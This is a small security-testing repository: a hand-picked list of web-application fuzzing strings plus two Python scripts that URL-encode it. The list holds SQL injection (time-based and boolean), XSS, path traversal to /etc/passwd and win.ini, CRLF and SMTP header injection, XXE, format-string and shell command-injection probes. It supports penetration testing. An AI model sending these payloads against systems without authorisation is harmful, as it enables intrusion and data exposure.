├── README.md ├── ShortFuzzList-commented.txt ├── ShortFuzzList.txt ├── full-url-encoder.py └── partial-url-encoder.py /README.md: -------------------------------------------------------------------------------- 1 | # Fuzz String Lists 2 | 3 | Hand-picked web application fuzzing strings for initial testing of web application requests. The general use case will occur after one has mapped out a web application and has found some requests with lots of parameters. A quick fuzz of that request using Burp Intruder or wfuzz and this list could either discover a vulnerability or cause a strange response from the server. If a strange response is discovered, then more granular fuzzing/exploiting can be done with strings from https://github.com/danielmiessler/SecLists or https://github.com/minimaxir/big-list-of-naughty-strings. 4 | -------------------------------------------------------------------------------- /ShortFuzzList-commented.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DanMcInerney/FuzzStrings/7d39d3adbc5862704cd81e7b2f147a6c0aa2d240/ShortFuzzList-commented.txt -------------------------------------------------------------------------------- /ShortFuzzList.txt: -------------------------------------------------------------------------------- 1 | !@$%^&*()_+=-[]{`}~\|;':"?/>.<,# 2 | #,<.>/?":';|\~}`{][-=+_)(*&^%$@! 3 | ~ 4 | ! 5 | @ 6 | # 7 | $ 8 | % 9 | ^ 10 | & 11 | * 12 | ( 13 | ) 14 | _ 15 | _ 16 | + 17 | = 18 | { 19 | } 20 | [ 21 | | 22 | \ 23 | ` 24 | , 25 | . 26 | / 27 | ? 28 | ; 29 | : 30 | ' 31 | '' 32 | " 33 | "" 34 | < 35 | > 36 | -1 37 | 0 38 | 1 39 | null 40 | true 41 | false 42 | %00 43 | %01 44 | %70 45 | %20 46 | %00%00 47 | NaN 48 | SLEEP(30) /*‘ or SLEEP(30) or ‘“ or SLEEP(30) or “*/ 49 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(15000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(15000000,SHA1(0xDE7EC71F1)),SLEEP(30)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(15000000,SHA1(0xDE7EC71F1)),SLEEP(30)))OR"*/ FROM some_table WHERE ex = ample 50 | javascript://'/-->*/alert()/* 51 | javascript://'//" -->*/alert()/* 52 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> 53 | '"#||+>; 54 | '-- 55 | '; 56 | "-- 57 | "; 58 | or 9=9 59 | or 9=9-- 60 | or 9=9; 61 | or 9=9-- 62 | or 9=9; 63 | ' or 9=9-- 64 | ' or 9=9; 65 | " or 9=9-- 66 | " or 9=9; 67 | ' or '9'='9 68 | ' or '9'='9' 69 | ' or '9'='9'-- 70 | ' or '9'='9'; 71 | " or "9"="9 72 | " or "9"="9" 73 | " or "9"="9"-- 74 | " or "9"="9"; 75 | ) or ('9'='9 76 | )) or ('9'='9 77 | ) or ("9"="9 78 | )) or ("9"="9 79 | ' or 9=9 or ''=' 80 | " or 9=9 or ""=" 81 | union all select @@version-- 82 | (select @@fuzzstring) 83 | select @@fuzzstring 84 | ' or 9=9 or ''=' 85 | " or 9=9 or ""=" 86 | sleep(10)# 87 | 1 or sleep(10)# 88 | " or sleep(10)# 89 | ' or sleep(10)# 90 | " or sleep(10)=" 91 | ' or sleep(10)=' 92 | 1) or sleep(10)# 93 | ") or sleep(10)=" 94 | ') or sleep(10)=' 95 | 1)) or sleep(10)# 96 | ")) or sleep(10)=" 97 | ')) or sleep(10)=' 98 | ;waitfor delay '0:0:10'-- 99 | );waitfor delay '0:0:10'-- 100 | ';waitfor delay '0:0:10'-- 101 | ";waitfor delay '0:0:10'-- 102 | ');waitfor delay '0:0:10'-- 103 | ");waitfor delay '0:0:10'-- 104 | ));waitfor delay '0:0:10'-- 105 | '));waitfor delay '0:0:10'-- 106 | "));waitfor delay '0:0:10'-- 107 | benchmark(10000000,MD5(1))# 108 | 1 or benchmark(10000000,MD5(1))# 109 | " or benchmark(10000000,MD5(1))# 110 | ' or benchmark(10000000,MD5(1))# 111 | 1) or benchmark(10000000,MD5(1))# 112 | ") or benchmark(10000000,MD5(1))# 113 | ') or benchmark(10000000,MD5(1))# 114 | 1)) or benchmark(10000000,MD5(1))# 115 | ")) or benchmark(10000000,MD5(1))# 116 | ')) or benchmark(10000000,MD5(1))# 117 | pg_sleep(10)-- 118 | 1 or pg_sleep(10)-- 119 | " or pg_sleep(10)-- 120 | ' or pg_sleep(10)-- 121 | 1) or pg_sleep(10)-- 122 | ") or pg_sleep(10)-- 123 | ') or pg_sleep(10)-- 124 | 1)) or pg_sleep(10)-- 125 | ")) or pg_sleep(10)-- 126 | ')) or pg_sleep(10)-- 127 | x'"> 130 | ../../../../../../../../../../../../../../../etc/passwd 131 | ../../../../../../../../../../../../../../../etc/passwd%00 132 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd 133 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 134 | ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc//passwd 135 | ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd 136 | \../\../\../\../\../\../\../\../\../\../\../\../\../\../\../etc/passwd 137 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 138 | ../../../../../../../../../../../../../../../windows/win.ini 139 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini%00 140 | ../../../../../../../../../../../../../../../boot.ini 141 | ../../../../../../../../../../../../../../../boot.ini%00 142 | ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini 143 | ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//windows//win.ini 144 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vd2luZG93cy93aW4uaW5p 145 | %0d%0aEvilHeader:%20ThisShouldntExist%0d%0a 146 | %0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3EEvil content%3C/html%3E 147 | %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+pentest@coalfire.com%0d%0aRCPT+TO:+pentest@coalfire.com%0d%0aDATA%0d%0aFrom:+pentest@coalfire.com%0d%0aTo:+pentest@coalfire.com%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a 148 | ]]> 149 | ]>&xxe; 150 | ]>&xxe; 151 | ]>&xxe; 152 | count(/child::node()) 153 | 154 | 155 | &foo; 156 | %foo; 157 | */* 158 |
159 |
160 | 161 | 162 | %u003c 163 | %u003e 164 | %u0022 165 | \u0022 166 | \u003c 167 | \u003e 168 | eval("while(1);") 169 | {"\x00":0} 170 | {"1":0} 171 | [] 172 | {} 173 | %p%p%p%p 174 | %x%x%x%x 175 | %d%d%d%d 176 | %s%s%s%s 177 | %n%n%n%n 178 | ;echo fuzzstring 179 | && echo fuzzstring 180 | & echo fuzzstring 181 | `echo fuzzstring 182 | ///eff.org 183 | //eff.org 184 | /\eff.org 185 | https://eff.org 186 | œ∑´®†¥¨ˆøπ“‘ 187 | ⅛⅜⅝⅞ 188 | ЁЂЃЄЅІЇЈ 189 | ⁰⁴⁵₀₁₂ 190 | 田中さんにあげて下さい 191 | 사회과학원 어학연구소 192 | (ﾉಥ益ಥ）ﾉ ┻━┻ 193 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 194 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 195 | ما, يذكر االإطلاق عل إيو 196 | test‪ 197 | ‫test‫ 198 | � 199 | test 200 | I̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ 201 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop 202 | -------------------------------------------------------------------------------- /full-url-encoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from urllib import quote 4 | 5 | with open('ShortFuzzList.txt', 'r') as f: 6 | with open('ShortFuzzList-full-URL-encoded.txt', 'w') as e: 7 | lines = f.readlines() 8 | for l in lines: 9 | print l 10 | encoded = "".join("%{:02x}".format(ord(c)) for c in l) 11 | e.write(encoded[:-3]+'\n') 12 | -------------------------------------------------------------------------------- /partial-url-encoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from urllib import quote 4 | 5 | with open('ShortFuzzList.txt', 'r') as f: 6 | with open('ShortFuzzList-partial-URL-encoded.txt', 'w') as e: 7 | lines = f.readlines() 8 | for l in lines: 9 | print l 10 | encoded = quote(l)[:-3] #remove encoded newline 11 | e.write(encoded+'\n') 12 | --------------------------------------------------------------------------------